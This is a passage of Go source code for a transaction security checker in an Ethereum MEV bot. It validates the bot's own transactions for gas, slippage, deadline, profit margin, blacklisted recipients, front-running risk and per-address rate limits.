Errors []string `json:"errors"`
RecommendedGas *big.Int `json:"recommended_gas,omitempty"`
MaxSlippage uint64 `json:"max_slippage_bps,omitempty"`
EstimatedProfit *big.Int `json:"estimated_profit,omitempty"`
Metadata map[string]interface{} `json:"metadata,omitempty"`
}
// MEVTransactionRequest represents an MEV transaction request
type MEVTransactionRequest struct {
Transaction *types.Transaction `json:"transaction"`
ExpectedProfit *big.Int `json:"expected_profit"`
MaxSlippage uint64 `json:"max_slippage_bps"`
Deadline time.Time `json:"deadline"`
Priority string `json:"priority"` // LOW, MEDIUM, HIGH
Source string `json:"source"` // Origin of the transaction
}
// NewTransactionSecurity creates a new transaction security checker
func NewTransactionSecurity(client *ethclient.Client, logger *logger.Logger, chainID uint64) *TransactionSecurity {
return &TransactionSecurity{
logger: logger,
inputValidator: NewInputValidator(chainID),
safeMath: NewSafeMath(),
client: client,
chainID: chainID,
maxTransactionValue: new(big.Int).Mul(big.NewInt(1000), big.NewInt(1e18)), // 1000 ETH
maxGasPrice: new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e9)), // 10000 Gwei
maxSlippageBps: 1000, // 10%
blacklistedAddresses: make(map[common.Address]bool),
transactionCounts: make(map[common.Address]int),
lastReset: time.Now(),
maxTxPerAddress: 100, // Max 100 transactions per address per hour
}
}
// AnalyzeMEVTransaction performs comprehensive security analysis on an MEV transaction
func (ts *TransactionSecurity) AnalyzeMEVTransaction(ctx context.Context, req *MEVTransactionRequest) (*TransactionSecurityResult, error) {
result := &TransactionSecurityResult{
Approved: true,
RiskLevel: "LOW",
SecurityChecks: make(map[string]bool),
Warnings: []string{},
Errors: []string{},
Metadata: make(map[string]interface{}),
}
// Basic transaction validation
if err := ts.basicTransactionChecks(req.Transaction, result); err != nil {
return result, fmt.Errorf("basic transaction checks failed: %w", err)
}
// MEV-specific checks
if err := ts.mevSpecificChecks(ctx, req, result); err != nil {
return result, fmt.Errorf("MEV specific checks failed: %w", err)
}
// Gas price and limit validation
if err := ts.gasValidation(req.Transaction, result); err != nil {
return result, fmt.Errorf("gas validation failed: %w", err)
}
// Profit validation
if err := ts.profitValidation(req, result); err != nil {
return result, fmt.Errorf("profit validation failed: %w", err)
}
// Front-running protection checks
if err := ts.frontRunningProtection(ctx, req, result); err != nil {
return result, fmt.Errorf("front-running protection failed: %w", err)
}
// Rate limiting checks
if err := ts.rateLimitingChecks(req.Transaction, result); err != nil {
return result, fmt.Errorf("rate limiting checks failed: %w", err)
}
// Calculate final risk level
ts.calculateRiskLevel(result)
return result, nil
}
// basicTransactionChecks performs basic transaction security checks
func (ts *TransactionSecurity) basicTransactionChecks(tx *types.Transaction, result *TransactionSecurityResult) error {
// Validate transaction using input validator
validationResult := ts.inputValidator.ValidateTransaction(tx)
if !validationResult.Valid {
result.Approved = false
result.Errors = append(result.Errors, validationResult.Errors...)
result.SecurityChecks["basic_validation"] = false
return fmt.Errorf("transaction failed basic validation")
}
result.SecurityChecks["basic_validation"] = true
result.Warnings = append(result.Warnings, validationResult.Warnings...)
// Check against blacklisted addresses
if tx.To() != nil {
if ts.blacklistedAddresses[*tx.To()] {
result.Approved = false
result.Errors = append(result.Errors, "transaction recipient is blacklisted")
result.SecurityChecks["blacklist_check"] = false
return fmt.Errorf("blacklisted recipient address")
}
}
result.SecurityChecks["blacklist_check"] = true
// Check transaction size
if tx.Size() > 128*1024 { // 128KB limit
result.Approved = false
result.Errors = append(result.Errors, "transaction size exceeds limit")
result.SecurityChecks["size_check"] = false
return fmt.Errorf("transaction too large")
}
result.SecurityChecks["size_check"] = true
return nil
}
// mevSpecificChecks performs MEV-specific security validations
func (ts *TransactionSecurity) mevSpecificChecks(ctx context.Context, req *MEVTransactionRequest, result *TransactionSecurityResult) error {
// Check deadline
if req.Deadline.Before(time.Now()) {
result.Approved = false
result.Errors = append(result.Errors, "transaction deadline has passed")
result.SecurityChecks["deadline_check"] = false
return fmt.Errorf("deadline expired")
}
// Warn if deadline is too far in the future
if req.Deadline.After(time.Now().Add(1 * time.Hour)) {
result.Warnings = append(result.Warnings, "deadline is more than 1 hour in the future")
}
result.SecurityChecks["deadline_check"] = true
// Validate slippage
if req.MaxSlippage > ts.maxSlippageBps {
result.Approved = false
result.Errors = append(result.Errors, fmt.Sprintf("slippage %d bps exceeds maximum %d bps", req.MaxSlippage, ts.maxSlippageBps))
result.SecurityChecks["slippage_check"] = false
return fmt.Errorf("excessive slippage")
}
if req.MaxSlippage > 500 { // Warn if > 5%
result.Warnings = append(result.Warnings, fmt.Sprintf("high slippage detected: %d bps", req.MaxSlippage))
}
result.SecurityChecks["slippage_check"] = true
// Check transaction priority vs gas price
if err := ts.validatePriorityVsGasPrice(req, result); err != nil {
return err
}
return nil
}
// gasValidation performs gas-related security checks
func (ts *TransactionSecurity) gasValidation(tx *types.Transaction, result *TransactionSecurityResult) error {
// Calculate minimum required gas
minGas := uint64(21000) // Base transaction gas
if len(tx.Data()) > 0 {
// Add gas for contract call
minGas += uint64(len(tx.Data())) * 16 // 16 gas per non-zero byte
}
if tx.Gas() < minGas {
result.Approved = false
result.Errors = append(result.Errors, fmt.Sprintf("gas limit %d below minimum required %d", tx.Gas(), minGas))
result.SecurityChecks["gas_limit_check"] = false
return fmt.Errorf("insufficient gas limit")
}
// Recommend optimal gas limit (add 20% buffer)
recommendedGas := new(big.Int).SetUint64(minGas * 120 / 100)
result.RecommendedGas = recommendedGas
result.SecurityChecks["gas_limit_check"] = true
// Validate gas price
if tx.GasPrice() != nil {
if err := ts.safeMath.ValidateGasPrice(tx.GasPrice()); err != nil {
result.Approved = false
result.Errors = append(result.Errors, fmt.Sprintf("invalid gas price: %v", err))
result.SecurityChecks["gas_price_check"] = false
return fmt.Errorf("invalid gas price")
}
// Check if gas price is suspiciously high
highGasThreshold := new(big.Int).Mul(big.NewInt(1000), big.NewInt(1e9)) // 1000 Gwei
if tx.GasPrice().Cmp(highGasThreshold) > 0 {
result.Warnings = append(result.Warnings, fmt.Sprintf("high gas price detected: %s Gwei",
new(big.Int).Div(tx.GasPrice(), big.NewInt(1e9)).String()))
}
}
result.SecurityChecks["gas_price_check"] = true
return nil
}
// profitValidation validates expected profit and ensures it covers costs
func (ts *TransactionSecurity) profitValidation(req *MEVTransactionRequest, result *TransactionSecurityResult) error {
if req.ExpectedProfit == nil || req.ExpectedProfit.Sign() <= 0 {
result.Approved = false
result.Errors = append(result.Errors, "expected profit must be positive")
result.SecurityChecks["profit_check"] = false
return fmt.Errorf("invalid expected profit")
}
// Calculate transaction cost
if req.Transaction.GasPrice() != nil {
gasInt64, err := SafeUint64ToInt64(req.Transaction.Gas())
if err != nil {
ts.logger.Error("Transaction gas exceeds int64 maximum", "gas", req.Transaction.Gas(), "error", err)
result.Approved = false
result.Errors = append(result.Errors, fmt.Sprintf("gas value exceeds maximum allowed: %v", err))
result.SecurityChecks["profit_check"] = false
return fmt.Errorf("gas value exceeds maximum allowed: %w", err)
}
gasCost := new(big.Int).Mul(req.Transaction.GasPrice(), big.NewInt(gasInt64))
// Ensure profit exceeds gas cost by at least 50%
minProfit := new(big.Int).Mul(gasCost, big.NewInt(150))
minProfit.Div(minProfit, big.NewInt(100))
if req.ExpectedProfit.Cmp(minProfit) < 0 {
result.Approved = false
result.Errors = append(result.Errors, "expected profit does not cover transaction costs with adequate margin")
result.SecurityChecks["profit_check"] = false
return fmt.Errorf("insufficient profit margin")
}
result.EstimatedProfit = req.ExpectedProfit
result.Metadata["gas_cost"] = gasCost.String()
result.Metadata["profit_margin"] = new(big.Int).Div(
new(big.Int).Mul(req.ExpectedProfit, big.NewInt(100)),
gasCost,
).String() + "%"
}
result.SecurityChecks["profit_check"] = true
return nil
}
// frontRunningProtection implements front-running protection measures
func (ts *TransactionSecurity) frontRunningProtection(ctx context.Context, req *MEVTransactionRequest, result *TransactionSecurityResult) error {
// Check if transaction might be front-runnable
if req.Transaction.GasPrice() != nil {
// Get current network gas price
networkGasPrice, err := ts.client.SuggestGasPrice(ctx)
if err != nil {
result.Warnings = append(result.Warnings, "could not fetch network gas price for front-running analysis")
} else {
// If our gas price is significantly higher, we might be front-runnable
threshold := new(big.Int).Mul(networkGasPrice, big.NewInt(150)) // 50% above network
threshold.Div(threshold, big.NewInt(100))
if req.Transaction.GasPrice().Cmp(threshold) > 0 {
result.Warnings = append(result.Warnings, "transaction gas price significantly above network average - vulnerable to front-running")
result.Metadata["front_running_risk"] = "HIGH"
} else {
result.Metadata["front_running_risk"] = "LOW"
}
}
}
// Recommend using private mempool for high-value transactions
if req.Transaction.Value() != nil {
highValueThreshold := new(big.Int).Mul(big.NewInt(10), big.NewInt(1e18)) // 10 ETH
if req.Transaction.Value().Cmp(highValueThreshold) > 0 {
result.Warnings = append(result.Warnings, "high-value transaction should consider private mempool")
}
}
result.SecurityChecks["front_running_protection"] = true
return nil
}
// rateLimitingChecks implements per-address rate limiting
func (ts *TransactionSecurity) rateLimitingChecks(tx *types.Transaction, result *TransactionSecurityResult) error {
// Reset counters if more than an hour has passed
if time.Since(ts.lastReset) > time.Hour {
ts.transactionCounts = make(map[common.Address]int)
ts.lastReset = time.Now()
}
// Get sender address via signature recovery
signer := types.LatestSignerForChainID(tx.ChainId())
addr, err := types.Sender(signer, tx)
if err != nil {
// If signature recovery fails, use zero address
// Note: In production, this should be logged to a centralized logging system
addr = common.Address{}
}
// Increment counter
ts.transactionCounts[addr]++
// Check if limit exceeded
if ts.transactionCounts[addr] > ts.maxTxPerAddress {
result.Approved = false
result.Errors = append(result.Errors, fmt.Sprintf("rate limit exceeded for address %s", addr.Hex()))
result.SecurityChecks["rate_limiting"] = false
return fmt.Errorf("rate limit exceeded")
}
// Warn if approaching limit
if ts.transactionCounts[addr] > ts.maxTxPerAddress*8/10 {
result.Warnings = append(result.Warnings, "approaching rate limit for this address")
}
result.SecurityChecks["rate_limiting"] = true
result.Metadata["transaction_count"] = ts.transactionCounts[addr]
result.Metadata["rate_limit"] = ts.maxTxPerAddress
return nil
}
// validatePriorityVsGasPrice ensures gas price matches declared priority
func (ts *TransactionSecurity) validatePriorityVsGasPrice(req *MEVTransactionRequest, result *TransactionSecurityResult) error {
if req.Transaction.GasPrice() == nil {
return nil
}
gasPrice := req.Transaction.GasPrice()
gasPriceGwei := new(big.Int).Div(gasPrice, big.NewInt(1e9))
switch req.Priority {
case "LOW":
if gasPriceGwei.Cmp(big.NewInt(100)) > 0 { // > 100 Gwei
result.Warnings = append(result.Warnings, "gas price seems high for LOW priority transaction")
}
case "MEDIUM":
if gasPriceGwei.Cmp(big.NewInt(500)) > 0 { // > 500 Gwei
result.Warnings = append(result.Warnings, "gas price seems high for MEDIUM priority transaction")
}
case "HIGH":
if gasPriceGwei.Cmp(big.NewInt(50)) < 0 { // < 50 Gwei
result.Warnings = append(result.Warnings, "gas price seems low for HIGH priority transaction")
}
}
result.SecurityChecks["priority_gas_alignment"] = true
return nil
}
// calculateRiskLevel calculates the overall risk level based on checks and warnings
func (ts *TransactionSecurity) calculateRiskLevel(result *TransactionSecurityResult) {
if !result.Approved {
result.RiskLevel = "CRITICAL"
return
}
// Count failed checks
failedChecks := 0
for _, passed := range result.SecurityChecks {
if !passed {
failedChecks++
}
}
// Determine risk level
if failedChecks > 0 {
result.RiskLevel = "HIGH"
} else if len(result.Warnings) > 3 {
result.RiskLevel = "MEDIUM"
} else if len(result.Warnings) > 0 {
result.RiskLevel = "LOW"
} else {
result.RiskLevel = "MINIMAL"
}
}
// AddBlacklistedAddress adds an address to the blacklist
func (ts *TransactionSecurity) AddBlacklistedAddress(addr common.Address) {
ts.blacklistedAddresses[addr] = true
}
// RemoveBlacklistedAddress removes an address from the blacklist
func (ts *TransactionSecurity) RemoveBlacklistedAddress(addr common.Address) {
delete(ts.blacklistedAddresses, addr)
}
// GetSecurityMetrics returns current security metrics
func (ts *TransactionSecurity) GetSecurityMetrics() map[string]interface{} {
return map[string]interface{}{
"blacklisted_addresses_count": len(ts.blacklistedAddresses),
"active_address_count": len(ts.transactionCounts),
"max_transactions_per_address": ts.maxTxPerAddress,
"max_transaction_value": ts.maxTransactionValue.String(),
"max_gas_price": ts.maxGasPrice.String(),
"max_slippage_bps": ts.maxSlippageBps,
"last_reset": ts.lastReset.Format(time.RFC3339),
}
}